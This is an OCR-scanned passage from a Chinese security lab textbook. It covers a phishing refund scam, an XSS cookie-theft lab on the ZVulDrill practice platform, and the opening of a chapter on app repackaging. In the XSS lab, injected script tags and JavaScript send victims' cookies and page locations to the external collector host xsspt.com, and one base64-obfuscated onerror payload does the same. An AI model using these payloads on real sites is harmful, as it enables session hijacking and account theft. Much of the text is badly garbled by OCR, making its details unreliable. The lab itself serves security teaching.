与 其 仿冒 的 目标 有 很 强 的 关系 ,并 存在 一 定 的 迷惑 性 ,如 合法 链接 相似 的 域名 、 使 用 指 回合 
法 页 面 的 链接 及 视 沈 上 相似 的 内 容 等 。 只 有 提供 的 页 面具 有 户 惑 性 ,才能 计 导 用 户 输入 日 
己 的 敏感 信息 。 

网 络 钓鱼 者 首选 的 策略 是 通过 短信 (有 些 会 利用 伪 基 站 )、 邮 件 等 方式 大 量 发 送 诈 骗 信 
上 ,冒充 成 一 个 可 信和 的 组 织 机 构 ,去 引诱 尽 可 能 多 的 网 络 用 户 。 钓 鱼 者 会 发 出 一 个 让 用 户 采 
取 紧 急 动 作 的 请 求 ,告诉 用 户 应 根据 提示 来 保护 日 己 的 利益 免 受 侵害 ,其 中 这 些 欺骗 性 的 电 
于 邮件 或 短信 中 都 会 包含 一 个 容易 混 消 的 链接 ,该 链接 指 问 一 个 假冒 可 信和 组织 机 构 的 网 页 。 
E f& 34 dis 8B 52 SE BE SP CR Di «A. rd 18] 3 1 4L HF AB AERJ P A TE fir cte 83 Pr n] fri 
组 织 机 构 的 “官方 "网 站 提供 的 页 面 中 输入 他 们 的 个 人 敏感 信息 。 被 钓鱼 者 所 育 睐 的 可 信 组 
织 机 构 包 括 银 行 . 电 子 商 务 平台 (如 淘宝 `. 泵 东 等 )、 高校. 政府 机 关 等 。 

以 退 球 骗局 为 例 进行 说 明 。 此 类 钓鱼 欺诈 的 总 体 特点 是 : 骗子 首先 会 通过 一 些 渠道 获 
取 到 受害 者 的 网 购 信 息 , 利 用 受害 者 付款 后 等 待 收 贫 的 时 间 段 这 一 特征 来 假冒 卖家 或 客服 ， 
通过 打 电 话 的 方式 联系 买 家 ,以 文 付 系统 问题 等 说 词 诱 导 受 害 者 进行 退 寺 操作。 随后 ,骗子 
会 给 受害 者 发 去 链接 , 当 受 害 者 打开 该 链接 后 看 到 的 是 与 高 仿 东 知名 电 商 的 钓鱼 网 页 。 钓 
鱼网 页 会 诱导 受害 者 输入 文 付 宝 账号 、 密 码 、 银 行 卡号 ,身份 证 号 、 手 机 验证 码 等 诸多 资料 ， 
盗 刷 用 户 文 付 宝 和 银行 卡 。 
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6.5 XSS 获取 Cookie 攻击 


6.5.1 预备 知识 : ZvulDrill, WampServer 和 XSS 平台 


1. ZvulDrill 

在 学 习 和 研究 Web 漏洞 的 过 程 中 ,读者 需要 对 每 一 种 漏洞 进行 测试 ,以 便 验 证 其 存在 
的 安全 问题 后 开发 相应 的 攻击 工具 。ZVulDrill 是 一 个 功能 相对 单一 的 Web 漏洞 演练 平 
台 ,通过 该 平台 ,安全 测试 人 员 可 以 通过 实验 操作 了 解 某 一 具体 漏洞 的 特点 ,并 对 该 漏洞 的 
利用 价值 和 利用 方法 等 有 一 个 更 深入 全 面 的 认识 。 


2. WampServer 

WampServer 是 一 款 运 行 在 Windows 环境 下 的 整合 了 多 个 应 用 软件 的 软件 包 , 它 集成 
了 Apache Web IRJ r, PHP 解释 带 及 MySQL 数据 库 , 是 一 个 集成 安 疫 环境 的 服务 硕 软 
件 。 通 过 WampServer, 开 发 人 员 和 服务 大 网 站 管理 人 员 既 不 需要 使 用 较 多 时 间 和 精力 来 
配置 和 测试 运行 环境 ,也 避免 了 独立 安装 和 配置 不 同 软件 时 由 于 版 本 和 配置 等 原因 可 能 存 
在 的 冲突 。 

LAMP 是 基于 Linux 的 集成 开发 环境 ,包含 了 Apache、MySQL/MariaDB 和 PHP. f$ 
个 程序 都 符合 开放 源 代 码 标 准 。 其 中 ,Linux 是 开放 源 代码 的 操作 系统 ;: Apache 是 最 通用 
的 网 络 服务 需 软 件 ， MySQL 是 带 有 基于 网 络 管理 附加 工具 的 关系 数据 库 ; PHP 是 一 种 可 
用 Perl 或 Python 代替 的 流行 的 对 象 脚本 语言 , 它 吸 收 了 多 数 其 他 语言 的 优秀 特征 ,使 得 网 
络 开发 更 加 高 效 。 

开发 者 在 Windows 操作 系统 下 使 用 这 些 原来 只 能 在 Linux 环境 下 才能 运行 的 工具 , 称 
为 WAMP。 

3. XSS 平台 

XSS 平 台 可 以 帮助 安全 测试 人 员 对 XSS 相关 的 漏洞 特点 及 其 存在 的 危害 性 进行 深入 
学 习 。 通 过 XSS 平台 ,读者 可 以 了 解 到 XSS 存在 的 安全 问题 及 产生 的 原因 。XSS 的 功能 
包括 窃取 Cookie、 后 台 增 删改 文章 、 网 络 钓鱼 .利用 XSS 漏洞 进行 传播 修改 网 页 代码 、 网 站 
重 定向 、 获 取 用 户 信息 (如 浏览 器 信息 、IP 地 址 ) 等 。 


6.5.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 主要 掌握 以 下 内 容 。 
(D 通过 XSS 平 台 获 取 XSS 代码 的 方法 。 
(2) XSS 代码 获取 Cookie 攻击 的 原理 。 
(3) ZvulDrill 平台 的 基本 功能 。 

2. 实验 条 件 

本 实验 所 需要 的 软 硬 件 清 单 如 表 6-3 所 示 。 
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X 6-3 XSS 获取 Cookie 攻击 实验 清单 


18 


NEN EE 
攻击 机 — ir — Windows 7 
Firefox 等 浏览 
[| 1 | *XR | 1 
XE pL Windows Server 2008 
ZvulDrill, WampServer 


6.5.3 实验 过 程 


需要 说 明 的 是 ,在 进行 以 下 实验 操作 之 前 ,需要 事先 安装 和 配置 ZvulDrill 和 
WampServer 软件 。 有 关 ZvulDrill 和 WampServer 软件 的 安装 和 配置 方法 ,请 读者 参阅 相 
关 的 技术 文档 ,在 此 不 再 详 述 。 另 外 ,在 实验 中 ,攻击 机 要 能 够 访问 互联 网 。 本 实验 分 为 以 
下 3 个 阶段 进行 。 

1. 在 靶 机 上 开启 ZvulDrill 


步骤 1. 以 系统 管理 员 的 身份 正 稼 登录 靶 机 Windows Server 2008, 随后 打开 
phpMyAdmin--ZvulDrill 数据 库 。 具 体操 作为 : 进入 程序 Wamp 安装 目录 (本 实验 为 C:\ 
wamp) 中 ,打开 wampmanager. exe 程序 ,成 功 运 行 后 ,可 在 右 下 角 看 到 托盘 图 标 , 如 图 6-51 
所 示 。 


组 织 - ”| 加 打开 — 新建 文件 夫 
pau ms 
e TÄ 


NE 点 面 
1j 最 近 访 ja 的 位 置 


左 键 点 击 图 标 ， 
m 计算 机 SL EGER 
i» AME C) ’ 


Sn Pi 打开 程序 “wampmanager.exe” 


可 在 右 下 角 看 到 托盘 图 标 


(uU wampmanager.exe 修改 日 期 : 2010/12/31 3:40 创建 日 期 : 2016/11/23 14:29 
b 应 用 程序 大 小 : 1.11 NB Start All Services 
Stop All Services 


Restart All Services 


WAMPSERVER 2.5 


Fut Online 
|«|&|e [WEO wz M 


6-51 运行 wampmanager. exe f£ FF 


步骤 2: 打开 右 下 角 托 盘 图 标 中 的 Wamp 388, 3€ € phpMyAdmin 选项 打开 数据 库 ， 
在 其 中 可 以 看 到 ZVulDrill 数据 库 ,如 图 6-52 所 示 。 
步骤 3: 打开 ZVulDrill 数据 库 ,可 显示 其 详细 内 容 , 如 图 6-53 所 示 。 
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pua localhost / mysql wampser X 


回 数据 库 L SQL A 状态 a HP lg SH 时 SA 


: 打开 *Wamp> 菜 单项 


E] 
RT 


I 


J dvwa 


Ha) information schema s 服务 器 连接 排序 规则 Q: 选择 "phpMyAdmin” 


ma mysql utfamb4 general ci bi (127.0.0.1 via TCPAIP) 弹 出 "phpMyAdmin" 
Ha performance schema e 服务 器 类 型 : MySQL 


p. test 一 一 e 服务 器 版 本 : 5.6.17 - 数据 库 窗口 


Ig zvuldrill 外 观 设 置 ana Community Server Powered by Alter Way 
可 见 “ZVulDrill” 数 据 库 


MT e 协议 版 本 : 10 
LL Led e 用 户 : root@localhost 
中 文 - Chinese simplified -| 。 服务 器 字符 集 : UTRS 
4) XM : | pmahomme M Unicode (ut) 


e 字号 :| 82% M 


p 更 多 设置 


HEHEHEHE 


+ 


Start All Services 
Stop All Services 
Restart All Services 


wj" € o viram ™ 


6-52 ”显示 ZVulDrill 数据 库 


A localhost / mysql wampser: X 


O © localhost/phpmyadmin/*PMAURL-8: db ztructure. php? dbzzvuldrill&tablezázerv 个 | B AX 会 v] zZ 


最 常 访问 O XE RAGAS @ 新 手 .上 路 O mb RRA eb 建议 网 站 @ 网 页 快讯 库 
ph p M U A d m i n CESS: mysql veampserver » @ ZEE: zvuldrill 


43958 是 结构 LJSQL aA RR 加 查询 [ eu i) SX A 操作 中 权限 
| diremme. E 表 。 HW 行 ” 类 型 排序 规则 
gj New 数 
PHa dvwa 9 
3 information schema admin SAS pese @ 搜索 RIA. R OME | MyISAM utf& general ci 
xr mysql 
"S 3 performance schema comment | | 浏览 结构 名 搜索 wcdüA 山 清 宝 QE 3 MyISAM utf8 general ci 
Pa test -—Á 
[rj zvuldril 
EL [j 浏览 请 结构 ap 搜索 pi deem QUE | MyISAM utf8 general ci 
"rj admin 
&- comment 5 InnoDB latinl swedish ci 
(+r j+ users 


i ARA 遇 数据 字典 


is saEuER | 


名 字 : ris. | 二 


6-53 ”显示 ZVulDrill 数据 库 的 详细 内 容 


步骤 4. 图 6-54 所 示 的 是 ZVulDrill 数据 库 中 的 数据 信息 ,其 中 admin 表 中 为 
ZVulDrill 平台 管理 员 信 息 。 
步骤 5: 图 6-55 所 示 的 是 ZVulDrill 数据 库 中 comment 表 中 的 数据 信息 , 即 ZVulDrill 


台 留 言 板 信息 。 
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最 常 访问 ， 火狐 官方 站 点 @ 新 手 上 路 o 常用 网 址 四 京东 商城 @ 建议 网 站 图 网 页 快讯 库 
phpM UA d m j n CESS: mysql wampserver > @ 24E: zvuldrill » gg x«: admin 
2 BÖGE 
(最 近 使 用 的 表 ) ,， M 
New 
Pa dvwa 
Sa information schema 
* G mysql 
Fa) performance schema 
+- a) test 
22575 zvuldril 
新 建 
[tri admin ' 
r$ comment 
rj users 


司 ABS S Xe s L| SQL a SX x: MA x SU B SA aa 权限 v 更 多 


w^ 正在 显示 第 0 - 0 fI (35 1 £7, rite 0.0000 $/) 


厂 性 能 分 析 [快速 编辑 ] [ 编辑 ] [解析 SOL] [ 创建 PHP 4553 ] [ 刷新 ] 


" admin id admin name admin pacc 


[^ £P B EH QNS 1 admin d033e22ae348aeb5660fc2140aec35850c4da997 


t Dk i: n @ 圳 除 B su 


| 查询 结果 探 作 上 


B 打印 预览 O HMRS ( 全 文 显示 ) 图 导出 gk 显示 图 表 国 新 建 视图 


6-54 ZVulDrill 数据 库 中 admin 表 中 的 数据 信息 


pu, localhost / mysql wampser X 


© localhost/phpmyadmi n/ #PMAURL-T : sql. php?db=zvuldrill&table=commen ÈJ | œ * | = 4 A Lv] 一 

最 常 访问 O 火狐 官方 站 点 @ 新 手 上 路 常用 网 址 四 京东 商城 db uibs db 网 页 快讯 库 

phpMyAdmin 加 服务 加: mysql warmpserver > gl A486: zvuldrill > gl a: comment E 

A B OOE) [] mis M A o Lj SQL 总 搜索 E B St x) SA 3s gR v 更 多 

| (BEER to... M 

d New 
J 4j dvwa 
FMa information schema 
Fa mysql SELECT * FROM comment 
Pa performance, schema 


西 test 
SG zvuldrill 


wv 正在 显示 第 0 - 2 行 (353 行 , HARS 0.0000 #) 


厂 性 能 分 析 [ 快速 编辑 ] [ 编辑 ] [解析 SQL ] [ 创建 PHP 代码 ] [ 刷新 ] 


| i I: |25 M 
uum 


(rp users 


+ 选项 

-T> " comment id user name comment text pub date 
[ IAR xx QS admin 123 2017-06-02 
r JAR EH OMi admin 2017-06-02 
C IAR xc @ 圳 除 admin 2017-06-02 


t Det iS: 54x Ome B SH 


- 
H5: 125 m 
localhost/phpmyadmin/sql. php?db-zvuldrill&table-comment&ésql query-SELECTt*^* &goto-&full text button-l&pftext-F&token-535e19659f5c7a45cf1d83e5a1b309 49 了 | 


6-55 ZVulDrill 数据 库 中 comment 表 中 的 数据 信息 


步骤 6: 图 6-56 所 示 的 是 ZVulDrill 数据 库 中 users 表 中 的 数据 信息 , 即 ZVulDrill 平 
台 注 册 用 户 信息 。 
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Au, localhost / mysql wanpser X Ws 


i " 
| c ) ®© localhost/phpmyadmin/tbl_rov_a n phpëPMAURL=1- sql. php?dbzzvuldrillétablezusers$serv 
CA 


e» Ca sn 
a 最 常 访问 O 火狐 官方 站 点 @ 新 手 上 路 O 常用 网 址 四 京东 商城 db 建议 网 站 db 网 页 快讯 库 


ph p MuJAcdmin CT RES SR: mysql wampserver > g 2338: zvuldrill > ji Æ: users 


$39 e c mu H AB A SQL 1 RR 3 HAS GU n SA cs NB J^ RE x MUR 
dinem. — v er | 
wv IEGEGURS 0 -0 行 ( 共 1 行 , 查 词 花费 0.0000 $5) 
R à New 
PHa dvwa 


PHa information schema 
qr mysql 


SELECT * FROM "users 
T 
PHa performance schema 
| 
d im [ 性 能 分 析 [快速 编辑 ] [ 898 ] [解析 SOL ] [ 8RR PHP £555 ] Eli ] 
j 新 建 
Grp admin 


t comment 
了 user id user name user pass user avatar — user bio join date 
C PRR KEH OME 1 admin d033e223e348aeb5660fc2140aec35850c4da997 | ../images 2017-02-12 

/Darkshell.pnp 
D 45x DE ， Q^ 修改 @ 删除 记 导出 


查询 结果 探 作 


By HEUS O 打印 预览 ( 全 文昌 示 ) E 导出 wb TAS (xp 新 建 视图 


6-56 ZVulDrill 数据 库 中 users 表 中 的 数据 信息 
2. 通过 XSS 平台 获取 XSS 代码 


步骤 1: 在 攻击 机 上 ,打开 FireFox 等 Web Das. Uil] XSS 平台 。 其 中 ,XSS 平台 的 
URL 地 址 为 http://xsspt. com, 登 录 XSS 平 台 后 的 主 界面 如 图 6-57 所 示 。 如 果 事 先进 行 


了 注册 ,可 直接 通过 该 界面 登录 ,否则 单 击 “ 注 册 ” 按 钮 ,进入 注册 新 用 户 界 面 。 


© 请” xsspt, com/index. php?do=login g mmc QQ 百度 人 trl+K> b*d | =] M 会 e! e 9- 
DE 最 常 访 问 火狐 官方 站 点 @ 新 手 上 路 O 常用 网 址 ma 正在 连接 m 正在 连接 四 京东 商城 图 建议 网 站 » 中 移动 版 书签 


"Fai ERE PE 
进入 注册 用 户 界 面 


开放 注册 ， 仪 用 于 安全 测试 ! 


图 6-57 XSS 平台 主 界面 
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步骤 2. 本 实验 单 击 “注册 ?按钮 。 当 读者 进入 注册 新 用 户 界 面 后 , 按 要 求 填 人 注册 信息 ， 
注册 一 个 新 账户 , 当 完 成 注册 操作 后 ,新 注册 的 账号 会 自动 登录 XSS 平 人 台 ”, 如 图 6-58 所 示 。 
单 击 “ 我 的 项 目 ” 右 侧 的 “创建 ”按钮 ,创建 一 个 新 项 目 。 创建 此 项 目的 目的 是 用 来 获取 存在 
XSS 网 站 (本 实验 中 ,该 网 站 为 读者 在 前 面 搭建 的 "ZVulDrill 漏洞 演练 平台 2” 的 Cookie fH. 


$ XSS Platform 


(€) Op xsspt com/index. php — ] — QU ix c [SB Ctrltk> 2A & 1$ u 9 ^5- 
DELIJZEMES CLIE Ed O XAR O Ewe oic: MEOELLIDIM.EI @ 网 页 快讯 库 口 移动 版 书签 


ED 


内 容 数 创建 时 间 操作 


B TU: 
创建 一 个 新 项 目 


B]6-58 ”新 注册 用 户 登 录 后 的 界面 


步骤 3: 在 打开 的 对 话 框 中 , 填 入 项 目 名 称 和 项 目 描 述 ( 此 项 可 不 填 ) ,然后 单 击 “下 
步 ” 按 钮 ,如 图 6-59 所 示 。 


$ XSS Platform 


(€ 1; xsspt. com/ index php?do-project&act-create g Ss C 
DE 最 常 访问 火狐 官方 站 点 @ 新 手 上 路 o 常用 网 址 加 正在 连接 … O 正在 连接 ** 四 京东 商城 @ 建议 网 站 ET: 


我 的 模块 


项 目 描 述 


il 
填 和 人 项 目 名 称 和 项 目 摘 述 后 ， 


ARER TEA 
取消 单 击 “下 一 步 ?按钮 


图 6-59 填 入 项 目 名 称 和 项 目 描述 
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n 4; 跳 转 到 如 图 6-60 所 示 的 选择 模块 界面 ,本 实验 中 由 于 只 是 为 了 获取 Cookie fri 
恩 , 因 此 选中 “默认 模块 " 复 选 框 ,然后 单 击 “* 下 一 步 ” 按 钮 继续 


Mi= E3 
T XSS Platform 


OY © xsspt. com/index. php? do=projectêĝact=setcodeĝty=createĝi g e Gc "EXC Dtrl*K | 会 | 白 A ^ nu ea ^ v 一 
最 常 访问 火狐 官方 站 点 @ 新 手 上 路 常用 网 址 加 正在 连接 … O 正在 连接 四 京东 商城 @ 建议 网 站 db 网 页 快讯 库 口 移 动 版 书签 


. C 基础 认证 钓鱼 APER ik ji 块 ” 


e L 著 取 内 网 |P 

9L 键盘 记录 

。[ 截取 网 页 屏幕 

eL 获取 保存 的 明文 密码 
. C 获取 页 面 源 码 


FE 自 定 义 代码 


== 


图 6-60 ”选择 模块 界面 


步骤 5: 跳 转 到 如 图 6-61 所 示 的 项 目 名 称 界 面 , 可 以 看 到 后 续 实 验 所 需 的 XSS 代码 ， 
此 代码 用 于 获取 目标 网 站 的 Cookie 信息 ,将 其 复制 一 份 。 es 完成 ”按钮 ,完成 创建 
新 项 目 。 

3. 获取 用 户 的 Cookie 信息 

返回 靶 机 ,访问 ZvulDrill 平台 并 创建 含有 XSS 代码 的 新 用 户 , 同 时 获取 该 用 户 的 
Cookie 信息 。 

步骤 1: Æ Web DU W ss Ps A "ZVulDrill 漏洞 演练 平台 ?的 URL 地址 (http://127.0.0.1/ 
ZV ulDrill 或 http: //localhost/ZVulDrilD ,打开 ZvulDrill 平台 的 主 界 面 , 如 图 6-62 所 示 。 
单 击 “注册 ?按钮 ,进入 注册 新 用 户 界 面 。 

步骤 2: 在 注册 新 用 户 界 面 填 入 注册 信息 ,在 注册 用 户 的 用 户 名 后 粘贴 刚刚 复制 的 XSS 
代码 ,如 图 6-63 所 示 。 

示例 注册 信息 为 : 


用 户 : hongya < script src = http://xsspt. com/rseDfn?1498122710 ></script > 
密码 : 123456 


第 6 章 Webl|W Zzsm g) 247 


号 ISS Platform x 


fh © xszpt. com/index. php?do7projectfact^vi ewcodeĝty=c Q 百度 «uli 
By 最 常 访问 Xd me @ AFLE O 常用 网 址 加 正在 连接 … O 正在 连接 * 四 京东 商城 二 建议 网站 db 网 页 快讯 库 


n 
zi 


项 目 名 称 : Xss 


MAEA : 


我 的 模块 


(function()[(new Image()).srcz'http://xsspt.com/index.php?dosapi&idsrseDfn&locations'«es 
cape( (function()[try(return document.location.href)catch(e)(return '')))())*'&toplocatio 
ns '«escape(( function()([try[return top.location.href]catch(e)(return ''j31)())*'&cookies "+ 
escape((function()[try(return document.cookie)]catch(e)[return '')])())*'&openers '«escape 
( (function()[try(return (window. opener && window.opener.location.href)?window.opener.loc 
ation.href:''jcatch(e)(return ''33)());1)0); 

if(''--1)(keep-new Image();keep.src-'http://xsspt.com/index.php?do-keepsession&id-rseDfn 
&urls '-escape(document.location)-'&cookies'sescape(document.cookie)); 


如 何 使 用 : 
棕 如 下 代码 导入 怀疑 出 现 x55 的 地 方 (注意 的 转 义 ) ， 即 可 在 观看 xSS 效 果 ，。 


«script srcehttp: / MOENIA. conn se0fn21499119741» script» 获取 cookie 信息 的 xss 代码 
或 者 以 你 任何 想 要 的 方式 插入 
http://xsspt.com/rseDfn?1498119741 


网 址 痛 短 
再 或 者 以 你 任何 得 要 的 方式 插入 


«script srcshttp://t.cn/RofTYw9»«/script» 
再 或 者 以 你 任何 息 要 的 方式 插入 


«img srcex onerrorseval(atob('czljcmvhdavFbGVtZlsoKCdzY33pcHOonKTtib2RSLmFucGVuZENoalixk KH 
HpO3Muc32 JPSdodHRwOiSveHNzcHQuY29tL33z ZURmbj8nkOihdagucmFuZG9tKCks '))» 


点 击 "完成 "按钮 ， 完 成 创建 


图 6-61 项 目 名 称 界面 


ZVulDrill X 


ej 最 党 访问 XE GL 新 手 上 路 O 常用 网 址 四 京东 商城 db 建议 网 站 b 网 页 快讯 库 


ZVulDrill 留言 Chanllege About d T 


. "As 
ZVUulDrill 


一 个 简单 的 Web 漏 洞 演练 平台 


一 个 简单 的 留言 板 , 包含 SQL 注入 ，XSS ,CSRF 等 常见 的 Web 漏 洞 


Copwvyright © 2014 zZerücloucd 


6-62  ZvulDrill 平台 主 操作 界面 
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其 中 ,用 户 名 hongya 后 的 < script src 王 http://xsspt. com/rseDfn? 1498122710 »«/ 
script > 是 在 XSS 平台 复制 的 获取 Cookie 的 XSS 代码 。 


ZVulDrill 


LE © 127.0. 0. 1 /zvuldrill/user/reg php g zm a ER BIS Culrno | T 外 4 A pri e A | ~ 
a Rha O LI ILE @ 新 手 上 路 _ 常用 网 址 加 正在 连接 obi: Aara E 建议 网 站 图 网 页 快讯 库 口 移动 版 书签 


ZVulDrill 留言 About 搜索 留言 
注册 


用 户 : 
hongya<script src-http-//xsspt.com/rseDfn? 1498122710» «/script» 
注册 信息 : 
新 密码 : 用 户 : hongya<script src-http://xsspt.com/rseDfn?1498122710* </script> 
292999 新 密码 : 123456 
确认 : 123456 
确认 : 


LALELE] 


Copyright © 2014 Zerücloud 


图 6-63 注册 用 户 界 面 


步骤 3: 单 击 “ 注 册 ” 按 钮 ,完成 注册 ,该 注册 用 户 会 自动 登录 ZVulDrill 平台 ,如 图 6-64 
所 示 。 此 时 ,已 经 获取 到 刚刚 创建 的 用 户 在 ZVulDrill 平台 的 Cookie 信息 。 


ZVulDrill x 中 


< ) © 127. 0.0. 1/zvuldrill/user/user.phr 
| 县 最 常 访问 火狐 官方 站 点 她 新手 上 路 


ZVulDrill 2 Chanllege About 


该 用 户 已 自动 登录 ZVulDrill 平 台 


Copyright © 2014 zerücloud 


图 6-64 ”用户 自动 登录 ZVulDrill 平台 
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步骤 4. 返回 XSS 平 台 , 打 开 前 面 实验 中 创建 的 XSS 项目 ,如 图 6-65 所 示 。 


F XSS Platform 


(€. © xsspt. com/:ndex. php g os c | Q 百度 «el 


项 目 描述 a 创建 时 间 操作 


hongya 0 2017-06-22 
我 的 模块 


“打开 创建 的 Xss 项 目 


6-65 打开 XSS 项 目 


步骤 5: 可 以 看 到 在 实验 中 插入 的 XSS 代码 已 获取 到 了 目标 用 户 的 Cookie 信息 ,如 
图 6-66 所 示 。 


$ XSS Flatforn x 十 


[4 ) (I) | xsspt. con/inde php?dozprojecthact-vi ee&ti d-9663 gs c lO BE «cuin 
— | 


5j 最 常 访问 O 火 扳 官 方 站 点 @ FLR — 常用 网 址 加 正在 连接 四 正在 连接 … 四 京东 丙 城 db 建议 网 站 db 网 页 快讯 库 


tnm 
LA 


项 目 内 容 


项 目 名 称 : Xss 
Domain [em H 


接口 地 址 http //«sspt.com/do/auth/f74432b55a08442c50369584a384560673 ( hn /domainhox 可 通过 域名 过 湾内 容 ) 
EXEC 


接收 的 内 容 Request Headers 


e location : http //127.0.0 1/z e HTIP REFERER : http.// 


插入 的 xss 代 码 ， 所 
获取 的 cookie 信 息 


6-66 XSS 代码 已 获取 到 了 目标 用 户 的 Cookie 信息 
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步骤 6: 单 击 “展开 ”按钮 ,可 看 到 如 图 6-67 所 示 的 详细 信息 。 


0=Jroject 久 act=vi emt d-9663 gis c Q 百度 «triK 
FELSDOEMMES C £542 @ AFLE O RAPA D Ew D Emir Nara O AE 


项 目 内 容 


项 目 名 称 : Xss 
Domain m "| 


接口 地 址 : http. /sspt.com/do/auth/f74432b53084420c50369594384b60673 (加 /domain^oox 可 通过 域名 过 滤 内 容 ) 
安装 插件 


接收 的 内 容 Request Headers 


e location : http.//127 .0.0.1/z e HTTP. REFERER : http:// 
vuldrill'user/user.php 127 0.0. 1/zwuldrill'user/us 
e toplocation : http.//127 0.0 er php 
|/zvuldrill'user/user php e HTTP. USER AGENT : 
所 获取 cookie 的 详细 信息 e cookie ^—— Mi Mozilla/5.0 (Windows NT 
mSkauingbg5aq2ko0a4q 5.1; WOW54; rv 54 0) Ge 
esh1 cK0/20100101 Firefox/54 
0 
e REMOTE_ADDR : 101.2 
54.184.154 


6-67 ”显示 目标 用 户 的 详细 Cookie 信息 


6.5.4 任务 与 思考 


为 了 提高 用 户 的 互联 网 应 用 体验 ,现在 许多 网 站 中 包含 了 大 量 的 动态 显示 内 容 。 为 了 
与 早期 的 显示 固定 信息 的 静态 网 站 进行 区 分 ,将 这 种 提供 动态 信息 显示 功能 的 网 站 称 为 动 
态 网 站 。 所 谓 动 态 显 示 内 容 , 是 指 根据 用 户 环 境 和 需要 ,Web 应 用 程序 能 够 动态 地 输出 相 
应 用 户 所 需要 的 信息 。 

动态 站 点 会 受到 “路 站 脚本 攻击 ”(Cross Site Scripting) . JJ T 5E JE IEN X (Cascading 
Style Sheet. CSS) [EX 43 . UP XSS 的 威胁 ,而 静态 站 点 则 完全 不 受 其 影响 。 亚 意 攻击 者 会 在 
Web 页 面 中 搬入 恶意 Script 代码 , 当 用 户 浏 览 该 页 时 , 散 入 Web 中 的 恶意 Script 代码 会 被 
执行 ,从 而 达到 恶意 攻击 用 户 的 目的 。 

XSS 攻击 可 以 分 为 两 种 类 型 : 非 持 久 型 KSS 攻击 与 持久 型 XSS 攻击 。 其 中 , 非 持久 型 
XSS 攻击 是 一 次 性 的 , 仅 对 当 次 的 页 面 访问 产生 影响 ; 非 持久 型 XSS 攻击 要 求 用 户 访问 一 
个 被 攻击 者 算 改 后 的 链接 ,用 户 访 问 该 链接 时 ,被 植 入 的 攻击 脚本 被 用 户 浏 览 副 执行 ,从 而 
达到 攻击 目的 。 持 久 型 XSS 攻击 会 把 攻击 者 的 数据 存储 在 服务 需 端 ,攻击 行为 将 伴随 着 攻 
击 数 据 一 直 存 在 。 
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移动 互联 网 (Mobile Internet,MJ) 是 一 种 通过 智能 移动 终端 采用 移动 无 线 通 信 方 式 获 
取 业 务 和 服务 的 新 兴业 态 ,包含 终端 .软件 和 应 用 3 个 层面 。 其 中 ,终端 层 包 括 智能 手机 、 平 
板 电 脑 、 电 子 书 等 ,软件 层 包括 操作 系统 、 中 间 件 、 数 据 库 和 安全 软件 等 ,应 用 层 包 括 休 闲 娱 
乐 类 、 工 具 媒体 类 .商务 财经 类 等 不 同 应 用 与 服务 。 近 年 来 , 随 着 智能 手机 等 移动 终端 的 普 
及 ,各 类 APP(Application ,应 用 ) 等 应 用 的 丰富, 以 及 4G/5G., Wi-Fi 等 无 线 接 入 方式 的 发 
展 , 移 动 互 联网 已 经 不 是 单纯 作为 传统 互联 网 的 补充 ,而 是 正在 以 独特 方式 引领 着 互联 网 技 
术 的 发 展 和 变 单 。 应 用 的 快速 发 展 带 来 了 安全 威胁 的 日 益 严 峻 ,本 童 通 过 具体 实验 ,使 读者 
对 移动 互联 网 应 用 安全 从 攻击 和 防范 两 个 角度 有 一 个 较为 全 面 的 认识 。 


7.1 程序 加 元 


7.1.1 预备 知识 : 入 向 工程 


逆 回 工程 也 称 为 " 反 回 工程 ,在 信息 技术 领域 是 指 对 一 个 信息 系统 或 软件 进行 的 逆 回 分 析 
及 人 研究 ,从 而 得 到 系统 或 软件 的 架构 和 开发 源 代码 等 要 系 ,进而 对 其 进一步 分 析 或 优化 处 理 。 

攻击 者 也 可 以 利用 逆向 工程 原理 和 思路 ,采用 逆 辐 分析 工具 对 一 些 日 认为 有 利用 价值 
的 软件 进行 反 编 译 , 并 在 反 编 译 后 的 程序 中 加 入 恶意 代码 ,经 青 次 编译 ( 二 次 打包 ) 后 上 传 到 
一 些 审核 不 严 的 免费 网 站 (如 手机 应 用 商店 .手机 软件 商店 等 ) 供 用 户 下 载 , 以 达到 入 侵 和 千 
取 用 户 信息 的 目的 。 

对 于 大 量 使 用 的 基于 Android 开源 系统 的 应 用 软件 ,目前 出 现 了 许多 汇编 和 反 汇 编 工 
具 , 如 smali 和 baksmali。 首 先 ,使 用 baksmali 反 汇 编程 序 对 有 利用 价值 的 客户 端 软件 及 木 
马 程 序 进行 反 汇 编 ,然后 对 反 汇 编 结 果 进 行 整合 (整合 过 程 中 还 会 尽 可 能 地 隐藏 木马 程序 的 代 
13) ,之 后 再 利用 smali 汇编 工具 进行 汇编 编译 ,生成 最 后 的 二 次 打包 可 执行 文件 (DEX 文件 )。 

ASPack 是 高 效 的 Win32 可 执行 程序 压缩 工具 ,能 对 程序 员 开 发 的 32 位 Windows 可 
执行 程序 进行 压缩 。 目 前 大 家 经 党 使 用 的 一 些 压 缩 工 具 , 通 和 常 是 将 计算 机 中 的 文档 进行 压 
缩 以 便 缩小 储存 空间 ,但 是 压缩 后 就 无 法 耳 接 运行 ,如 果 想 运行 必须 解压 缩 。 男 外 , 当 用 户 
的 系统 中 没有 安装 压 缩 软件 时 ,压缩 包 将 无 法 打开 。 而 ASPack 是 专门 对 Win32 可 执行 程 
厅 进 行 压 缩 的 工具 ,压缩 后 程序 能 正常 运行 。 而 且 即 使 用 户 已 经 将 ASPack 工具 从 系统 中 
删除 ,经 ASPack 压缩 过 的 文件 仍然 能 正常 使 用 。 使 用 ASPack 工具 压缩 后 仍然 能 够 执行 
这 一 功能 特征 ,是 可 以 实现 对 文件 加 却 操 作 的 。 


7.1.2 实验 目的 和 条 件 


1. 实验 目的 
在 移动 应 用 中 ,应 用 程序 来 源 的 真实 性 和 可 靠 性 决定 着 应 用 的 安全 性 ,在 国内 的 移动 用 
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户 端 ,Android 智能 终端 占有 绝对 的 应 用 比例 ,然而 由 于 Android 和 月 身 所 具有 的 开放 性 ,在 
为 各 类 应 用 的 快速 发 展 提 供 了 便捷 的 同时 ,安全 问题 同样 引起 了 社会 各 界 的 普遍 关注 , 尤 
其 是 针对 Android 环境 的 应 用 程序 加 充 , 更 是 具体 应 用 中 的 主要 威胁 。 通 过 本 实验 的 学 
2] ,使 读者 在 学 习 文 件 加 这 实现 原理 和 方法 的 基础 上 ,了 解 加 这 在 移动 应 用 中 存在 的 安 
全 威胁 。 

2. 实验 条 件 

